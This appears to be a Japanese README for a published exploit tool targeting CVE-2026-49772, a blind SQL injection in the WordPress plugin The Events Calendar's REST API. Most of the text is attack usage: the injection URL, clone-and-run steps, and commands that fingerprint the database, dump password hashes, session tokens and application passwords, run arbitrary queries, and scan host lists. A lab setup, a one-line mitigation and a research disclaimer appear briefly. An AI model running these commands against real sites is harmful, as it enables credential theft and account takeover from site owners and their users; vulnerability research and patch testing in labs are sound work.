
The Events Calendar WordPressプラグインを標的としたCVE-2026-49772のブラインドSQLインジェクションエクスプロイト。ブール/時間ベースのオラクルを介してデータベース内容を抽出し、マルチスレッドスキャン、ユーザーハッシュダンプ、カスタムクエリサポートを備える。
CVE-2026-49772 は、WordPressプラグイン The Events Calendar における 認証されていないブラインドSQLインジェクション です。壊れたRESTパラメータバリデータ(validate_callback が検証を行わずクロージャを返す)により、実験的な tec/v1 REST APIの order パラメータが、未サニタイズのままSQLの ORDER BY 句に到達します。
GET /wp-json/tec/v1/events?orderby=event_date&order=<INJECTION>
... ORDER BY event_date <INJECTION>, wp_posts.post_date DESC ...
これは 読み取り専用 のインジェクションです(スタックドクエリは不可、書き込み不可、直接出力なし)。しかし、データベース全体はブールベース/時間ベースのオラクルを介して抽出可能です:ユーザーのパスワードハッシュ、セッショントークン、アプリケーションパスワード、秘密鍵。
影響を受けるバージョン: The Events Calendar 6.15.12 – 6.16.2 (6.16.3 で修正済み)
深刻度: CVSS 3.1 9.3 Critical — AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L
--check — 非破壊的な検出: RESTネームスペース、プラグインバージョン、時間ベースの確認--recon — DBフィンガープリント: バージョン、現在のユーザー、データベース、OS、権限、テーブルプレフィックス--users — wp_users をダンプ: ログイン名、メールアドレス、パスワードハッシュ--user-meta — wp_usermeta をダンプ: セッショントークン、アプリケーションパスワード、権限--get-table — 自動カラム検出で任意のテーブルをダンプ--query — 任意のスカラー SELECT の結果を抽出純粋なPython 3標準ライブラリのみ — 標準的なワークフローのために requirements.txt が含まれていますが、追加でインストールされるものはありません。
git clone https://github.com/joshuavanderpoll/CVE-2026-49772.git
cd CVE-2026-49772
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
python3 CVE-2026-49772.py --help
git clone https://github.com/joshuavanderpoll/CVE-2026-49772.git
cd CVE-2026-49772
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
python CVE-2026-49772.py --help
python3 CVE-2026-49772.py <target> <action> [options]
アクションは1つだけ選択してください: --check, --recon, --users, --user-meta, --get-table <TABLE>, --query <SQL>。すべてのオプションは --help で確認できます。
python3 CVE-2026-49772.py target.tld --check
python3 CVE-2026-49772.py target.tld --recon
python3 CVE-2026-49772.py target.tld --users
python3 CVE-2026-49772.py target.tld --query "SELECT @@version"
チューニング: --technique boolean|time, --delay, --threads, --rows, --prefix, --where, -useragent, -timeout。複数のホストをスキャンするには -l targets.txt を使用します。
脆弱なプラグイン(起動時にダウンロードせず同梱)と、あらかじめ登録されたイベントを備えた、自己完結型のDocker Composeラボです。docker/DOCKER.md を参照してください。
cd docker/
docker compose up -d
python3 ../CVE-2026-49772.py localhost:8080 --check
/wp-json/tec/v1/ をブロックするこのツールは教育および研究目的のみで提供されます。所有しているシステム、または明示的な書面によるテスト許可を得たシステムに対してのみ使用してください。作成者は、このツールの誤用または損害について一切の責任を負いません。